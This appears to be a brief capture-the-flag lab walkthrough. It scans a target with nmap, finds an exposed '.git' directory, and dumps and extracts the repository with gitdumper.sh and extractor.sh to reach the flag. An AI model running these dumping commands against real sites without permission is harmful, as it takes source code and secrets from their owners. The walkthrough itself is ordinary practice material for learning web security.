ENUMERATION

First we will use nmap to scan the target ip to discover open ports
nmap -sC -sV -O <target ip>

nmap -sC -sV -O <target_ip>

As you can see the nmap scan found a “.git” repository, http://targetip:80/.git/

let’s use some tools to get all the data found in the repository.

here i downloaded a tool which will enable me to dump all the files to my machine

Now lets dump the data
> ./gitdumper.sh http://targetip/.git/ </output/path/>

Now lets extract the data from the git file we dumped on our machine
> ./extractor.sh <path to the dumped file> <output/path>

now navigate to the directory where your extracted data was saved

checkout the index.html file for every folder to find your flag.

thanks for reading, i hope you found your way to the flag!!.

REGARDS
NIRU IFEDINIRU OZIOMA